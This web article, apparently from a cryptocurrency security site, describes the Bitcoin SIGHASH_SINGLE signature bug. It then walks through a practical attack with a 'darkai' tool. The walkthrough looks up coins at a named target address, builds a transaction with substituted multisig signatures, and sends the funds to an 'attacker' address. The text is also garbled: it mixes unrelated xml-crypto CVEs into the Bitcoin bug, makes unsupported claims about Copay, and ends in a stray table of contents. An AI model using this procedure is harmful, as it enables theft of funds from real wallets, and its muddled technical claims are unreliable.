Despite high security technologies, vulnerabilities are sometimes found in the Bitcoin network that can lead to theft of funds and loss of user trust. One such example was a serious signature type issue SIGHASH_SINGLE (0x03)that was discovered in practice in BitPay ‘s Copay multi-signature wallet .

In Bitcoin, each signature has a special flag (SIGHASH) that defines the scope of the transaction that the signature covers. SIGHASH types affect the security and flexibility of transactions. SIGHASH_SINGLEis one such type that signs all inputs of a transaction , but only one output , whose number corresponds to the number of the input being signed.

Example: if a signature refers to the input with index 0 ( vin 0), then it signs only the output with index 0 ( vout 0).

In essence, this type allows a party to an agreement to confirm only part of the transfer – that the input data matches all inputs, and the expenditure goes to a specific address, without recording the other outputs.

Vulnerability `SIGHASH_SINGLE` and its essence

The problem occurs when a transaction has more inputs than outputs . In this case, an input whose index exceeds the last number of outputs has no corresponding output that can sign SIGHASH_SINGLE.

In practice, the Bitcoin implementation allows for the erroneous behavior of returning a constant with the number one ( int 1) instead of the transaction hash. This is equivalent to taking a fixed value for the signature instead of the computed hash. Because of this, an attacker can forge scriptSigand use valid signatures from another transaction for inputs with missing outputs, re-spending funds without knowing the private keys .

In other words, the attack allows a single-output transaction to be created under the attacker’s control by spending the inputs from the target transactions, even though the private keys to sign the original outputs are missing. This “repeat” signature scriptSig becomes legitimate for the network, leading to the theft of BTC coins .

Copay wallet was one of the first victims of the cryptographic attack of digital signature forgery (Digital Signature Forgery Attack). Analysis of the transaction status showed that:

The exploit SIGHASH_SINGLEallowed attackers to control funds distributed across a 2 of 3 multi-signature wallet.
This meant that two transaction inputs with indices greater than the number of outputs could actually be spent without private keys.
The theft occurred by creating a transaction with a single output to an address controlled by the attacker.

Ways to minimize the threat and further development of the protocol

Script Isolation and Virtual Machine
Solutions have been proposed to allocate separate virtual environments for multi-signature wallets to limit the impact of emerging vulnerabilities.
Using SIGHASH_ANYONECANPAY
This additional flag allows for more flexibility in which inputs are subject to signature, reducing the risk of transactions being incorrectly linked.
Softfork and implementation of new sighash flags
Modern proposals, such as SIGHASH_NOINPUTtechnical updates to the protocol, allow to improve the security and flexibility of second-layer transactions, for example, in the Lightning Network (LN-Symmetry, Eltoo).
Migration to Schnorr signature scheme and Taproot update
New cryptographic methods provide more reliable and compact protection of signatures and allow for more efficient implementation of multi-signatures with minimal vulnerabilities.

The issue SIGHASH_SINGLEexposed a critical flaw in Bitcoin’s signature mechanism, allowing funds to be stolen by reusing signatures on inputs without corresponding outputs. The vulnerability became an important lesson and impetus for the protocol’s evolution, encouraging developers to implement more robust standards. Modern Bitcoin developments, such as new sighash flags, soft forks, the Lightning Network , and the move to more secure signature schemes, are aimed at preventing such attacks and improving user security.

Understanding this level of technical detail is critical for developers, wallet operators, and cryptocurrency analysts to ensure they can confidently protect their assets in the ever-evolving blockchain space.

Unspent transaction outputs of coins to Bitcoin Address under the control of the attacker

Let’s run the command to get information about unspent transaction outputs ( UTXO) under the control of the address 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3

!./darkai -unspent 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3

The result obtained:

The output contains a list of one object describing a specific unspent transaction output ( output):

{
  "output": "23e81960ba8bb95c33c2336c84c126e378e4d1123921f881da9247c25f524161:1",
  "value": 300000
}

1. Unspent Transaction Output (UTXO)

UTXO is a ” Unspent Transaction Output“, i.e. a transaction output that has not yet been spent and is available for use in new transactions.
In the Bitcoin network, funds are stored in exactly these outputs.
Each transaction has one or more outputs, each of which can contain a certain number of satoshi, the smallest units of value Bitcoin.

2. Output structure

output— a line consisting of two parts:
- 23e81960ba8bb95c33c2336c84c126e378e4d1123921f881da9247c25f524161— is txid , the identifier of the transaction in which this output was created.
- :1— the index of a specific output in the transaction. In this case, it is the second output, since indexing starts from zero.
value— output value:
- 300000— the amount of funds in satoshi.
- Bitcoin conversion: 300,000 satoshi = 0.003 BTC

3. Meaning for the address owner

This UTXO is under the control of the address 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3
This means that this user or wallet has the right to create a transaction using these 0.003 BTC from the specified output.
Access to use a UTXO is achieved by creating an input in a new transaction specifying it outputas the source of funds and providing a valid signature.

4. Practical application

UTXO analysis and accounting allows:
- Estimate the balance of the address.
- Optimize the creation of new transactions – for example, choose UTXOs to minimize fees.
- Ensure correct aggregation and spending of funds, avoiding errors when signing transactions.

Forming new transactions using these UTXOs;
Optimization of output selection to save on fees;
Analysis of other transactions and addresses;

The team ./darkai -unspenthas successfully identified and returned one legitimate unspent transaction output controlled by the specified Bitcoin address. The amount of available funds is 0.003 BTC. This result is the current budget status of the owner of this Bitcoin address and serves as the basis for forming and sending future transactions using these funds.

Unspent transaction results to target Bitcoin Address: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

Let’s run the command and get data on unspent transaction outputs (UTXO) associated with a Bitcoin address 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe that contain certain funds in BTC coins.

!./darkai -unspent 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

Target address for Digital Signature Forgery Attack:

32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

The amount of available funds received Bitcoins is controlled by the user or the system executing the command.

Unspent Transaction Outputs (UTXO). After running, we get the result in a list of two UTXOs:

[
  {
    "output": "8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0",
    "value": 677200
  },
  {
    "output": "bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0",
    "value": 5000000
  }
]

Decoding of data and each element:

1. First UTXO

Transaction ID (txid): 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd
Output index: 0 (first output from transaction)
Meaning: 677200 satoshi

Convert to Bitcoin: 677200/100000000 = 0.006772BTC

2. Second UTXO

Transaction ID (txid): bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786
Output index: 0
Meaning: 5000000 satoshi

Convert to Bitcoin: 5000000/100000000 = 0.05BTC

It is important to know that UTXO (Unspent Transaction Output) is a single output of a previously completed transaction that has not yet been used to create a new transaction. In other words, these are the funds remaining on the account that can be spent in the future.

Each UTXO contains information about how many satoshi it represents and what transaction it came from.
To spend funds, you must use the UTXO as an input in a new transaction.
UTXO sizes affect the amount that can be spent on network fees.

Total balance of the address

Taking into account the given data, the total balance of this address is: 0.006772 + 0.05 = 0.056772BTC 0.006772 + 0.05 = 0.056772BTC

These funds are available to the address owner for subsequent transactions.

Choosing UTXO for transactions

When creating a new transaction, the wallet selects from a list of UTXOs which ones to use to cover the required amount and fee.
Sometimes it is beneficial to use several small UTXOs or one large one, depending on the situation and fee optimization.

Security and transparency

UTXO can be seen in blockchain explorers, which ensures transparency of your own funds and the possibility of audit.
Owning the private keys for this address gives you full control over these outputs.

Technical features of the analysis

Receiving UTXO is done through a direct request to the node or a specialized API, which allows you to quickly determine the current balances at the address.
The tool darkaiis able to recognize and decode such data, providing a person with a convenient and understandable format.

The team ./darkai -unspent 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCeidentified two unspent transaction outputs (UTXOs) controlled by the specified Bitcoin address. The total available funds are approximately 0.05677 BTC, which reflects the current balance and available assets for spending. This data is key to any process of managing funds: creating new transactions, accounting for balances, optimizing fees, and ensuring the security of working with cryptocurrency.

Script for creating and signing a Bitcoin transaction using multi-signature outputs and SIGHASH_SINGLE

Let’s look at an extensive example of working with Bitcoin transactions in practice – starting from receiving unspent outputs (UTXO) of several addresses, forming a new transaction using these outputs, signing the transaction inputs using the signature type SIGHASH_SINGLE, and ending with the result – transferring all BTC to a specific address. Particular attention is paid to technical details that are important for understanding the vulnerabilities and features of Bitcoin clients with multi-signature scenarios.

1. Getting unspent outputs (UTXO) for addresses

1.1. Bitcoin address of the attacker for appropriation of funds in BTC coins:

addr = '1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3'
unspent(addr)
# Conclusion:
[{'output': '23e81960ba8bb95c33c2336c84c126e378e4d1123921f881da9247c25f524161:1', 'value': 300000}]

This contains one output that is unspent and available for use.
Value: 300000 satoshi ( 0.003 BTC).

1.2. Target Bitcoin address for Digital Signature Forgery Attack:

target = '32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe'
unspent(target)
# Conclusion:
[
  {'output': '8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0', 'value': 677200},
  {'output': 'bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0', 'value': 5000000}
]

Two UTXOs were found for the target address with amounts of 677200 ( 0.006772 BTC) and 5,000,000 satoshi ( 0.05 BTC).

2. Forming inputs and outputs for a new transaction

ins = unspent(addr) + unspent(target)
# Calculating the amount:
amount = 300000 + 5000000 + 677200 # = 5977200 satoshi
amount -= 10000 # Subtracting the miner's fee: 10000 satoshi, the final amount to send:
amount = 5967200 satoshi

All three unspent outputs (UTXO) from both addresses are added to the inputs.
For the output, the Bitcoin Address 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3 was selected , where all funds minus the commission will be sent.

outs = [{'address': addr, 'value': amount}]

3. Creating and signing a transaction

3.1. Assembling a new transaction (without signatures):

tx = mktx(ins, outs)

3.2. Signing the first login using a private key:

tx = sign(tx, 0, priv)
tx = deserialize(tx)

3.3. Manually substitute scriptSig for inputs using SIGHASH_SINGLE signatures:

tx['ins'][1]['script'] = '0048...53ae' # signing input 1 with multi-signature (SIGHASH_SINGLE)
tx['ins'][2]['script'] = '0048...53ae' # similar for input 2

These scriptSigcontain two signatures, each of which signs only its corresponding input and the corresponding (single) output (SIGHASH_SINGLE).
In addition, scriptSigit comes redeemScriptwith three public keys for a multi-signature wallet.

4. Final transaction serialization and sending

!./darkai -serialize 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

This transaction spends all three inputs and sends the funds to the attacker’s Bitcoin address 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3

Final result:

tx = [{'791fe035d312dcf9196b48649a5c9a027198f623c0a5f5bd4cc311b8864dd0cf'}]

In this case, virtually all BTC (including from the target address) were transferred under the control of one address.

5. Features of using SIGHASH_SINGLE

The serious feature SIGHASH_SINGLEis that the signature protects only one specific input and output with the same index.
If a transaction has more inputs than outputs, some inputs will not have a corresponding output.
Due to a known Bitcoin bug, the signature hash is returned as a fixed value in this case 1, allowing an attacker to reuse valid signatures from another transaction for unsecured outputs.
This creates a vulnerability: forging a valid one scriptSigfor those inputs where there is no corresponding output leads to incorrect, but accepted behavior in the network.

Even with multi-signature scenarios ( 2 из 3), knowing this vulnerability, an attacker can effectively steal funds by creating transactions with barely noticeable modifications using SIGHASH_SINGLE. The example provided illustrates such an attack: inputs from several Bitcoin addresses (including the target one) are collected, a transaction with one output to the attacker is formed, and the transaction is validated.

According to the data, funds were sent to the attacker’s Bitcoin address 1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3 , where by processing the unupdated xml-crypto library for incorrect data values, manipulative transactions were made from the Bitcoin wallet: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe , where subsequently coins were lost in the amount of: 0.059672 BTC as of July 2025, this amount is: 7,052 USD

Conclusion

As a result of cryptanalysis of the cryptographic attack of forgery of digital signature (Digital Signature Forgery Attack), it becomes obvious that despite the high reliability of the basic cryptographic algorithms, such vulnerabilities as CVE-2025-29774 in CVE-2025-29775 the library xml-crypto and the bug SIGHASH_SINGLEin the Bitcoin protocol open up effective ways for attackers to bypass authentication mechanisms and steal cryptocurrency without private keys. Using the example of the attack on the multi-signature wallet Copay, it is shown how the subtleties of cryptographic implementation and errors in signature verification lead to the loss of funds and the undermining of trust in the security of the blockchain.

This clearly demonstrates that the stability of crypto platforms depends not only on cryptographic algorithms, but also on the correct implementation and timely updating of components involved in verifying digital signatures.

Secure processing with Bitcoin requires the correct use of signature types SIGHASH.
How the total input portion of a new transaction is formed from UTXOs of multiple addresses.
How to create and sign a complex multi-signature transaction using the flag SIGHASH_SINGLE.
How known features of the Bitcoin protocol can lead to a vulnerability that can lead to theft of funds.
As a final result: all BTC addresses were transferred to one controlled address.
Improvements to signatures (such as Taproot and Schnorr signatures) are aimed at addressing such issues.
Wallet developers must strictly validate and update transaction generation components.

To prevent such incidents, it is necessary to immediately eliminate the identified vulnerabilities, switch to more secure algorithms (for example, from SHA-1 to SHA-256), and introduce comprehensive methods for assessing and strengthening cybersecurity, since in the era of rapidly developing technologies and new types of attacks, the security of cryptocurrency systems requires constant monitoring, rapid response and a comprehensive approach – only then can we guarantee the protection of digital assets and maintain user confidence in the blockchain.

References:

Modern Password Cryptanalysis: How Unique Salts and Slowdown Algorithms Protect Data in the Age of Attacks and Bitcoin
Cryptanalysis of Bitcoin transactions: internal mechanisms and software features
Segregated Witness: A Key Step Towards Bitcoin Scalability & Security Is Deep Cryptanalysis. How SegWit Implementation Affects Protection Against Transaction Data Forgery
Bitcoin Cryptanalysis: Mechanisms and Reliability of SHA-256 in Ensuring Blockchain Security and How Future Technological Advances Will Affect SHA-256’s Resilience to Digital Signature Forgery Attacks
Hidden risks of multi-signature Bitcoin wallets: analysis of Copay vulnerability via SIGHASH_SINGLE attack (Digital Signature Forgery Attack) vulnerabilities such as CVE-2025-29774 and CVE-2025-29775 in the xml-crypto library and the SIGHASH_SINGLE bug in the Bitcoin protocol
DeserializeSignature vulnerability in Bitcoin protocol: deep cryptanalysis and risks of forging ECDSA signatures and how to protect against fake signatures in the Bitcoin network that exploit this vulnerability
Multi-Signatures in Bitcoin: How It Works, How to Protect Funds, How It Works, and How Leaking Private Keys Increases Fraud Risks
The New Frontier of Cybersecurity Key Ecosystem Vulnerabilities and Cryptanalysis Bitcoin 2025: IoT Security Threat from CVE-2025-27840 Vulnerability in ESP32 Microcontrollers
Unveiling Anomalies: Cryptanalytic Insights into the $8 Billion Bitcoin Transaction and Its Implications for Blockchain Transparency
Cryptanalytic Disclosures: Unmasking Geopolitical Cyber Espionage and Financial Irregularities in the Nobitex Blockchain Breach
Cryptanalysis of the 2025 Bitcoin Blockchain: Unraveling Over $2 Billion in Crypto Hacks and Fraud in H1 Amid Escalating Cyber Threats
Cryptanalysis of Bitcoin Amid Evolving Web3 Cyberattacks: Dissecting $1 Million Theft by Impersonating IT Specialists and the Escalating Security Crisis in 2025
Cryptanalysis of the Bitcoin Blockchain in 2025: Revealing the Surge of $2.1 Billion Lost to Private Key and Front-End Exploits Driving Record Crypto Thefts
Cryptanalysis of the Bedrock Protocol Breach: Unraveling Social Engineering, Insider Threats, and Resilient TVL Growth in a $2 Million Liquid Staking Cyberattack
SparkKitty, a new cross-platform Trojan that steals cryptodata via infected apps: a threat to users in Southeast Asia, China and around the world: Cryptanalysis of Bitcoin Security Threats: Unmasking SparkKitty Trojan’s Cross-Platform Crypto Data Heist on iOS and Android in Southeast Asia and Beyond
Discord Ledger Hack and Data Leaks: How Scammers Exploit Users’ Trust to Steal Cryptocurrency and What Security Measures Are in Place: Cryptanalysis of Blockchain Security: Investigating the Ledger Discord Hack and the Exploitation of User Trust in Crypto Seed Phrase Phishing Attacks
Critical Mobius Token Hack: Over $2.15M Stolen on BNB Chain — Scale of Losses Undermines Investor Confidence, Calls for Security Enhancements: Cryptanalysis and Exploit Dynamics of the Mobius Token Smart Contract Hack: Unveiling the $2.15 Million BNB Chain Breach and its Implications for DeFi Security in 2025
Meta Pool Stops Hacker Attack: Quick Unstake Vulnerability Allowed Creation of Uncollateralized mpETH Tokens, But Low Liquidity and Quick Response Minimized Damage: Cryptanalysis of the Meta Pool Breach: Dissecting the $27M mpETH Minting Exploit Through Fast Unstake Vulnerability and Liquidity Constraints
The Insidiousness of Cyber Threats: How Fake Cold Wallets and Malicious Drivers Are Emptying Crypto Assets and What to Do to Protect Yourself: Cryptanalysis of Bitcoin Asset Drainage: Exposing the Menace of Fake Cold Wallets and Malicious Drivers in 2025’s Cyber Threat Landscape
Alex Protocol Strengthens Security and Restores User Trust via USDC Stable Compensation Following Major Exploit: Cryptanalysis of the Alex Protocol Bitcoin DeFi Exploit: Dissecting the $8.3 Million Self-Listing Verification Breach and Restoring Trust through USDC Compensation
Bybit After $1.4 Billion Hack: Comprehensive Security Update, Liquidity Restoration, and New Cyber Attack Challenges Cryptanalysis of the Historic $1.4 Billion Bybit Hack: Unraveling Sophisticated Cold Wallet Exploits, North Korean Attack Vectors, and the 2025 Security Overhaul
Social Engineering in 2025: The Main Vector of Attacks on Cryptocurrency and Modern Methods of Protection and How the Human Factor Became the Weak Link of Crypto Security: Cryptanalysis of the Human Factor: Unveiling Social Engineering as the Dominant Attack Vector in 2025’s Bitcoin Blockchain Security Landscape
Lazarus Group Vulnerabilities Revealed: How Hacker Mistakes and Security Measures Help Counter North Korean Group Cyberattacks: Cryptanalysis of State-Sponsored Cyber Warfare: Unmasking Lazarus Group’s $1.5 Billion Bybit Heist and the Evolution of North Korean Cyberattack Countermeasures
Cryptocurrency Hack Losses Decline in May 2025: Causes, Large-Scale Attacks, and Impact of North Korea Cyber Threats on Global Security and Industry Trust: Cryptanalysis of 2025 Bitcoin Blockchain Attacks: Exploring the Decline in Hack Losses Amid North Korean Threats and Their Impact on Global Crypto Security and Industry Trust
Rise of Crypto Scams in 2025: How Lack of Knowledge and Social Engineering Make Users Easy Targets: Cryptanalysis of the Bitcoin Blockchain in 2025: How User Vulnerability and Advanced Social Engineering Fuel the Surge in Crypto Scams
$12 Million Cork Protocol Hack: wstETH Market Vulnerability, Security Measures, and Refund Prospects. DeFi Under Attack, wstETH Market Vulnerability, and Refund Challenges Under New Law
The Cetus Hack and Lessons for Web3: MSB Vulnerabilities, Criticism of Centralized Interference, and New Security Standards with Multi-Sig Wallets: Cryptanalysis of the Cetus Protocol Hack: Exposing MSB Vulnerabilities, Centralization Critiques, and the Push for Multi-Sig Security Standards in Web3
Cyberattacks on Ledger users on the rise: How fake apps and seed theft are undermining trust in crypto wallets and what to do to protect yourself: Cryptanalysis of Bitcoin Wallet Security in 2025: The Rising Threat of Fake Apps and Seed Theft Undermining User Trust and Defenses
$220 Million Cetus Hack: Security Challenges, Sui Validators’ Response, and Lessons for Trust in Web3 Ecosystems: Cryptanalysis of the $223 Million Cetus Hack: Unveiling Overflow Vulnerabilities, Sui Validators’ Crisis Response, and Implications for Trust in Web3 Ecosystems
Massive Coinbase Data Leak: Causes, Consequences, and New Standards for Cybersecurity in the Crypto Industry: Cryptanalysis of the 2025 Coinbase Data Breach: Insider Threats, Social Engineering Exploits, and Advancing Cybersecurity Standards in the Crypto Industry
Social Engineering and Crypto Fraud: Unique Threats to Coinbase and the Need for a Unified Defense: Cryptanalysis of the 2025 Coinbase Data Breach: Social Engineering as the Ultimate Crypto Security Vulnerability and the Quest for Unified Defense
Safeheron Brings New Levels of Web3 Security and Privacy: The First Open Intel SGX TEE Framework for Ethereum and Decentralized Finance: Advancing Bitcoin Blockchain Cryptanalysis with Safeheron’s Open-Source Intel SGX TEE Framework: Pioneering Web3 Security and Privacy in Decentralized Finance
Cyber Threats in DeFi: How Standards Vulnerabilities, Social Engineering, and Mixers Like Tornado Cash Are Undermining Crypto Platform Security and User Trust: Cryptanalysis of Decentralized Finance Vulnerabilities: A Deep Dive into Standard Exploits, Social Engineering, and the Role of Crypto Mixers in Undermining Bitcoin Ecosystem Security

Digital Signature Forgery Attack: как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам методы операции с поддельными RawTX

This material was created for the CRYPTO DEEP TECH portal to ensure financial data security and cryptography on elliptic curves secp256k1 against weak ECDSA signatures in the BITCOIN cryptocurrency . The creators of the software are not responsible for the use of materials.

Source code

Crypto Tools

Google Colab

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/qbu1m_C1wyA

Video tutorial: https://dzen.ru/video/watch/68801dfc0c886621f7c1a0db

Source: https://cryptodeeptech.ru/digital-signature-forgery-attack

xml-crypto Digital Signature Forgery Attack Vulnerability

漏洞信息

仓库文件

来源概述

Critical vulnerability in signature-algorithms.ts code

Basic functionality

Supported algorithms

Technical details

Why does this critical collision attack allow creating different data with the same hash?

Additional notes:

Digital Signature Forgery Attack Mechanism

1. Vulnerabilities in RSA-SHA1 algorithms

2. Example of operation

3. Consequences

Technical details of the vulnerabilities:

CVE-2025-29774

CVE-2025-29775

Recommendations for troubleshooting

Practical part

Google Colab

1. Download and install the Dark AI tool

Detailed description of all terminal commands and actions

2. Launch the Dark AI tool

As a result, two UTXO objects were returned:

Data decoding:

Overall balance

Technical Interpretation with Dark AI

Deserialization of Bitcoin transaction

We get the structure of the response of the deserialization result:

Detailed explanation of elements: Value field

Detailed explanation of elements: Script field

Decoding the script

Practical significance of the result

Deserialize a transaction by identifier

Deserialization of the second Bitcoin transaction

1. Detailed explanation of elements: Value field

2. Detailed explanation of elements: Script field

Decoding the script

3. The practical meaning of the result, the size and purpose of the funds.

4. Registration of the exit to the level of compatibility with various services and wallets that support P2SH.

P2SH (Pay-to-Script-Hash) locking script in Bitcoin network. What does this script mean?

Why was this particular one chosen?

Why this hash and not another?

P2SH Mechanism: Meaning, Working Principle and Security in Bitcoin Network

How does the P2SH output script structure work?

The process of spending funds via a P2SH output

The advantages and importance of choosing such a mechanism

1. Flexibility and complex scenarios

2. Saving space

3. Increased security

4. Convenience for users and programmers

Example of use: multi-signature wallets

Cryptanalysis of the extraction of the first transaction input ( ins)

1. Detailed analysis of ScriptSig components ( script)

Analysis of the script structure:

2. Outpoint (outpoint)

3. Sequence (sequence)

The Importance of scriptSig in a Security Context

Detailed analysis of the result of extracting the second output ( outs)

The result obtained:

1. Detailed analysis of the received data field value

2. Field value script

The meaning and role of redeem script in the context of P2SH

Overall meaning of the result

The significance of the information obtained in a broader context

Let’s confirm the scriptSig decryption:

Let’s run the command:

Meaning and context of the result

Technical details and explanations

Why Satoshi Chose Double SHA-256 and How It Affects Cryptographic Strength

Reasons for choosing dual SHA-256

How does this affect cryptographic strength?

Multi-signature in Bitcoin: the role of redeemScript and the OP_CHECKMULTISIG instruction

What is redeemScript?

How does OP_CHECKMULTISIG work?

Features and bug with removing an element from the stack

Practical example: multi-signature 2 of 3

The Importance and Benefits of Multi-Signature Wallets

Technical and practical context

How Bitcoin Multisig Verification Mechanism Works with OP_CHECKMULTISIG and redeemScript

Cryptanalysis of the extraction of the first transaction input ( `ins`)

1. Detailed analysis of ScriptSig components ( `script`)

2. Outpoint (`outpoint`)

3. Sequence (`sequence`)

Detailed analysis of the result of extracting the second output ( `outs`)

1. Detailed analysis of the received data field `value`

2. Field value `script`

Vulnerability `SIGHASH_SINGLE` and its essence